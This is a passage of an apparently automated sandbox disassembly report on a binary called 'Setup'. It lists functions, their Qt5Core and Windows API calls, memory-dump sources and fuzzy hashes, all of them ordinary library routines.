                                                                                                                                                              • Instruction ID: 488049611b0297ec3e67a5eddc89829452f62ff8d7c851c07378da0941c6502b
                                                                                                                                                              • Opcode Fuzzy Hash: b7faffb152a9e85853e34852b2eca4067ca66f18fa3aec0ce77517458aab2f29
                                                                                                                                                              • Instruction Fuzzy Hash: 80416D72605A4186D791DF29E48056C77A1FB89FA4B18C132DF6E47794DF3EE485CB00
                                                                                                                                                              Function 00007FFBA19802D0 Relevance: 13.5, APIs: 9, Instructions: 48timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA19802FE
                                                                                                                                                              • ??0QDateTime@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA1980308
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA1980312
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA198031C
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA1980326
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA1980330
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1973FD4), ref: 00007FFBA198033A
                                                                                                                                                                • Part of subcall function 00007FFBA1978DC0: ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,00000000,00007FFBA1980357), ref: 00007FFBA1978E03
                                                                                                                                                                • Part of subcall function 00007FFBA1978DC0: ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA1978E37
                                                                                                                                                                • Part of subcall function 00007FFBA1978DC0: ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1978E44
                                                                                                                                                                • Part of subcall function 00007FFBA19797D0: ?typeName@QMetaType@@SAPEBDH@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA197981E
                                                                                                                                                                • Part of subcall function 00007FFBA19797D0: ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA1979845
                                                                                                                                                                • Part of subcall function 00007FFBA19797D0: ?reserve@QByteArray@@QEAAXH@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA1979853
                                                                                                                                                                • Part of subcall function 00007FFBA19797D0: ?append@QByteArray@@QEAAAEAV1@PEBDH@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA197986B
                                                                                                                                                                • Part of subcall function 00007FFBA19797D0: ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA1979876
                                                                                                                                                                • Part of subcall function 00007FFBA19797D0: ?append@QByteArray@@QEAAAEAV1@PEBDH@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA1979885
                                                                                                                                                                • Part of subcall function 00007FFBA19797D0: ?endsWith@QByteArray@@QEBA_ND@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA1979892
                                                                                                                                                                • Part of subcall function 00007FFBA19797D0: ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA19798A3
                                                                                                                                                                • Part of subcall function 00007FFBA19797D0: ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE(?,?,?,00000000,00000000,00007FFBA198035C), ref: 00007FFBA19798B0
                                                                                                                                                                • Part of subcall function 00007FFBA19797D0: ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA19798E8
                                                                                                                                                                • Part of subcall function 00007FFBA19797D0: ?hasRegisteredConverterFunction@QMetaType@@SA_NHH@Z.QT5CORE ref: 00007FFBA19798FF
                                                                                                                                                                • Part of subcall function 00007FFBA19797D0: ?registerConverterFunction@QMetaType@@SA_NPEBUAbstractConverterFunction@QtPrivate@@HH@Z.QT5CORE ref: 00007FFBA197991F
                                                                                                                                                                • Part of subcall function 00007FFBA19797D0: ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1979930
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA1980700
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QDateTime@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA198070E
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA198071C
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA198072A
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA1980738
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA1980746
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA1980754
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA198078E
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA1980798
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??1QString@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA19807A2
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??1QString@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA19807AC
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??1QString@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA19807B6
                                                                                                                                                                • Part of subcall function 00007FFBA19806C0: ??1QDateTime@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA1980364), ref: 00007FFBA19807C0
                                                                                                                                                              • ??4QByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA198036B
                                                                                                                                                              • ??4QByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE ref: 00007FFBA1980380
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$Meta$String@@$V0@@$?append@Type@@$?registerConverterDateFunction@Time@@Type@$BasicFlag@Flags@NormalizedObject@@@Timer@@TypeType@@@@$?ends?has?normalized?reserve@?typeAbstractName@Object@@Private@@RegisteredWith@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 810054842-0
                                                                                                                                                              • Opcode ID: c5c91c101c2bc8e72f5fe1a14fbf9265536351711434db7f5871df5c4d29c3fb
                                                                                                                                                              • Instruction ID: 6b495daf610578f4b305e72dbac5c78561ce9192a66fdc12d7877a92ee92b91c
                                                                                                                                                              • Opcode Fuzzy Hash: c5c91c101c2bc8e72f5fe1a14fbf9265536351711434db7f5871df5c4d29c3fb
                                                                                                                                                              • Instruction Fuzzy Hash: 191133A261AA1291EB419F31E8540696331FF94F98F444031DE1E47669EF3CD946CF40
                                                                                                                                                              Function 00007FFBA19FFB00 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 82memorywindowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19FF413), ref: 00007FFBA19FFB4B
                                                                                                                                                              • LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19FF413), ref: 00007FFBA19FFBA3
                                                                                                                                                              • swprintf_s.MSPDB140-MSVCRT ref: 00007FFBA19FFBF1
                                                                                                                                                              • ?fromWCharArray@QString@@SA?AV1@PEB_WH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19FF413), ref: 00007FFBA19FFC07
                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19FF413), ref: 00007FFBA19FFC2C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Local$?fromAllocArray@CharFormatFreeMessageString@@swprintf_s
                                                                                                                                                              • String ID: IDispatch error #%d$Unknown error 0x%0lX
                                                                                                                                                              • API String ID: 3202307814-2934499512
                                                                                                                                                              • Opcode ID: 3719f0fcea7e990346dbfe32eb5e58b5ac441a2d680247cca50caeac6c2d4b6a
                                                                                                                                                              • Instruction ID: 72f5b3c3b69db0c13d1b02b00febf56ea03c23c6eb397bed5417acc224a7aacc
                                                                                                                                                              • Opcode Fuzzy Hash: 3719f0fcea7e990346dbfe32eb5e58b5ac441a2d680247cca50caeac6c2d4b6a
                                                                                                                                                              • Instruction Fuzzy Hash: 4431A2A2A0AB4581EB958B65E05017977A0FB84FA4F148236DF5D077E4DF7CD84ACB00
                                                                                                                                                              Function 00007FFBA19E13B0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 43COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QObject@@QEAA@PEAV0@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19DF4D2), ref: 00007FFBA19E13BF
                                                                                                                                                              • ??0QRecursiveMutex@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19DF4D2), ref: 00007FFBA19E13DB
                                                                                                                                                              • ??0QString@@QEAA@VQLatin1String@@@Z.QT5CORE ref: 00007FFBA19E140A
                                                                                                                                                              • ??0QFactoryLoader@@QEAA@PEBDAEBVQString@@W4CaseSensitivity@Qt@@@Z.QT5CORE ref: 00007FFBA19E1426
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA19E1431
                                                                                                                                                                • Part of subcall function 00007FFBA19DEAE0: ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE ref: 00007FFBA19DEB23
                                                                                                                                                                • Part of subcall function 00007FFBA19DEAE0: ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA19E1473), ref: 00007FFBA19DEB57
                                                                                                                                                                • Part of subcall function 00007FFBA19DEAE0: ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA19E1473), ref: 00007FFBA19DEB64
                                                                                                                                                                • Part of subcall function 00007FFBA19E4380: ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE ref: 00007FFBA19E43C3
                                                                                                                                                                • Part of subcall function 00007FFBA19E4380: ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA19E1478), ref: 00007FFBA19E43F7
                                                                                                                                                                • Part of subcall function 00007FFBA19E4380: ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA19E1478), ref: 00007FFBA19E4404
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$Object@@String@@$?normalized?registerFlag@Flags@NormalizedObject@@@TypeType@@Type@@@@$CaseFactoryLatin1Loader@@Mutex@@Qt@@@RecursiveSensitivity@String@@@V0@@
                                                                                                                                                              • String ID: /bearer$org.qt-project.Qt.QBearerEngineFactoryInterface
                                                                                                                                                              • API String ID: 4122440066-2899753972
                                                                                                                                                              • Opcode ID: a4e2aca08986e9630b560e7f54a0b5b2bb57e9cdd40c8cff475ea268ecd24ca8
                                                                                                                                                              • Instruction ID: 93f3021207eb1516bf1b4ddcee69706d9c7210bb4908e4206cfa5a02001fdc3a
                                                                                                                                                              • Opcode Fuzzy Hash: a4e2aca08986e9630b560e7f54a0b5b2bb57e9cdd40c8cff475ea268ecd24ca8
                                                                                                                                                              • Instruction Fuzzy Hash: 7121F97660AB4696EB51CB25F5402A973B0FB48768F400132DE9D43B68EF3CE1A5CF40
                                                                                                                                                              Function 00007FFBA197DBE0 Relevance: 12.2, APIs: 8, Instructions: 191COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Variant@@$?const?convert@?dispose@?userData@Data@1@@Data@@Int@ListType@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2974530379-0
                                                                                                                                                              • Opcode ID: b95fcf3fc4511ac67c157aceafaf326a028bcf21522c73145ae1eb59f1927dd6
                                                                                                                                                              • Instruction ID: 117cedc17accc1cd4a48678c341e5e06fa93079b9006862b92ef2f5a88071051
                                                                                                                                                              • Opcode Fuzzy Hash: b95fcf3fc4511ac67c157aceafaf326a028bcf21522c73145ae1eb59f1927dd6
                                                                                                                                                              • Instruction Fuzzy Hash: 8E818572A1AA4286EBA28F35D55027963A1FF44B98F5C4136DE5E477A4DE3CE442CF00
                                                                                                                                                              Function 00007FFBA1987020 Relevance: 12.2, APIs: 8, Instructions: 162COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isValid@QVariant@@QEBA_NXZ.QT5CORE(?,?,?,00007FFBA197613E), ref: 00007FFBA1987043
                                                                                                                                                                • Part of subcall function 00007FFBA1984620: ??1QString@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA198413E), ref: 00007FFBA19846A6
                                                                                                                                                                • Part of subcall function 00007FFBA1984620: ??1QUrl@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA198413E), ref: 00007FFBA19846B0
                                                                                                                                                              • ?willGrow@QHashData@@QEAA_NXZ.QT5CORE(?,?,?,00007FFBA197613E), ref: 00007FFBA19870C6
                                                                                                                                                              • ?allocateNode@QHashData@@QEAAPEAXH@Z.QT5CORE(?,?,?,00007FFBA197613E), ref: 00007FFBA1987119
                                                                                                                                                              • ??0QVariant@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA197613E), ref: 00007FFBA1987136
                                                                                                                                                              • ??4QVariant@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA197613E), ref: 00007FFBA1987151
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA197613E), ref: 00007FFBA19871EF
                                                                                                                                                              • ?freeNode@QHashData@@QEAAXPEAX@Z.QT5CORE(?,?,?,00007FFBA197613E), ref: 00007FFBA19871FB
                                                                                                                                                              • ?hasShrunk@QHashData@@QEAAXXZ.QT5CORE(?,?,?,00007FFBA197613E), ref: 00007FFBA1987212
                                                                                                                                                                • Part of subcall function 00007FFBA197D9D0: ?detach_helper@QHashData@@QEAAPEAU1@P6AXPEAUNode@1@PEAX@ZP6AX0@ZHH@Z.QT5CORE ref: 00007FFBA197DA08
                                                                                                                                                                • Part of subcall function 00007FFBA197D9D0: ?free_helper@QHashData@@QEAAXP6AXPEAUNode@1@@Z@Z.QT5CORE ref: 00007FFBA197DA3B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@Hash$Variant@@$Node@V0@@$?allocate?detach_helper@?free?free_helper@?has?willGrow@Node@1@Node@1@@Shrunk@String@@Url@@Valid@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1579217366-0
                                                                                                                                                              • Opcode ID: cf916cec17a2f07e50579bfe684d001ae6e9389e8a774817124987b68d46d520
                                                                                                                                                              • Instruction ID: 0935b0e34723a685c85ec856b105be6fb488f2d005586522eb7a3744e05853ad
                                                                                                                                                              • Opcode Fuzzy Hash: cf916cec17a2f07e50579bfe684d001ae6e9389e8a774817124987b68d46d520
                                                                                                                                                              • Instruction Fuzzy Hash: 4861507670AA4582EBA9CF26E45013977A2FB94FD8B458436CE8E47B50DF3CE442CB50
                                                                                                                                                              Function 00007FFBA197E110 Relevance: 12.2, APIs: 8, Instructions: 160COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@Hash$Variant@@$Node@V0@@$?allocate?detach_helper@?free?free_helper@?has?willGrow@Node@1@Node@1@@Shrunk@Valid@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2799732448-0
                                                                                                                                                              • Opcode ID: 864d9b36b2821cba6cd7498e0f00221524bb85dca42125d274310ce0e44321cb
                                                                                                                                                              • Instruction ID: 997485d4d82f286b9d92cf13585befcd71c1a60779ebf199b9aa1f962fc11df5
                                                                                                                                                              • Opcode Fuzzy Hash: 864d9b36b2821cba6cd7498e0f00221524bb85dca42125d274310ce0e44321cb
                                                                                                                                                              • Instruction Fuzzy Hash: 64516DB2A0AA5586EB95CB26E55017D77A1FF84FD8B848032CE1E17750DF3CE852CB50
                                                                                                                                                              Function 00007FFBA1A45AF0 Relevance: 12.1, APIs: 8, Instructions: 133memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?sharedNull@QArrayData@@SAPEAU1@XZ.QT5CORE(?,00007FFBA1A437DE), ref: 00007FFBA1A45B0F
                                                                                                                                                                • Part of subcall function 00007FFBA1A31990: ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE ref: 00007FFBA1A319A8
                                                                                                                                                                • Part of subcall function 00007FFBA1A31990: ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE ref: 00007FFBA1A319CD
                                                                                                                                                                • Part of subcall function 00007FFBA1A31990: ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE ref: 00007FFBA1A319E4
                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00007FFBA1A437DE), ref: 00007FFBA1A45B3B
                                                                                                                                                              • ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@@Z.QT5CORE(?,00007FFBA1A437DE), ref: 00007FFBA1A45BCC
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,00007FFBA1A437DE), ref: 00007FFBA1A45C5E
                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00007FFBA1A437DE), ref: 00007FFBA1A45CBC
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,00007FFBA1A437DE), ref: 00007FFBA1A45CF3
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,00007FFBA1A437DE), ref: 00007FFBA1A45CFC
                                                                                                                                                              • ?deallocate@QArrayData@@SAXPEAU1@_K1@Z.QT5CORE(?,00007FFBA1A437DE), ref: 00007FFBA1A45D0E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array$Data@@$?data@$Logger@@MessageU1@_$?allocate@?deallocate@?shared?warning@AllocationCategory@@Data@@@@@Enabled@Flags@H00@LoggingNull@Option@Warningfreemalloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2868654654-0
                                                                                                                                                              • Opcode ID: c1a753dcd6df8b2e925dac40a6961b45348348eaee8ce34eb5665a961a2a4ff0
                                                                                                                                                              • Instruction ID: b24860362bb214df8ab16069499d5070052709441b749ad6ba867b6d5eeb273b
                                                                                                                                                              • Opcode Fuzzy Hash: c1a753dcd6df8b2e925dac40a6961b45348348eaee8ce34eb5665a961a2a4ff0
                                                                                                                                                              • Instruction Fuzzy Hash: 4651927260AAC286D7B5CF21D8402BD7361EB84B95F148136DE5E57B98EE3CD586CF00
                                                                                                                                                              Function 00007FFBA197D660 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?lock@QMutex@@QEAAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197ABC6), ref: 00007FFBA197D6A0
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197ABC6), ref: 00007FFBA197D6C0
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197ABC6), ref: 00007FFBA197D6D8
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197ABC6), ref: 00007FFBA197D777
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197ABC6), ref: 00007FFBA197D785
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197ABC6), ref: 00007FFBA197D807
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197ABC6), ref: 00007FFBA197D815
                                                                                                                                                              • ??1QMutexLocker@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA197ABC6), ref: 00007FFBA197D820
                                                                                                                                                              Memory Dump Source
